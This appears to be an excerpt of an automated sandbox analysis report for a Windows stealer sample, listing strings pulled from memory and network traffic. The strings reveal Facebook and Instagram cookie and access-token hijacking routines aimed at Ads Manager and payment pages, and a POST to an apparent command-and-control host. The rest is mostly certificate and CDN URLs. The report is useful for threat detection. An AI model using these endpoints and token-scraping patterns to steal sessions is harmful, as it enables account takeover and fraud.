https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: c8dd8ae6dc4dc644.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/ddd
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/r
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364144645.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.e
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crxx
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://drive.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1612045890161.exe.3.drString found in binary or memory: http://ocsp.comodoca.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0B
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0E
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0F
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0K
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0M
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0P
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ocsp.thawte.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.3.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.3.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
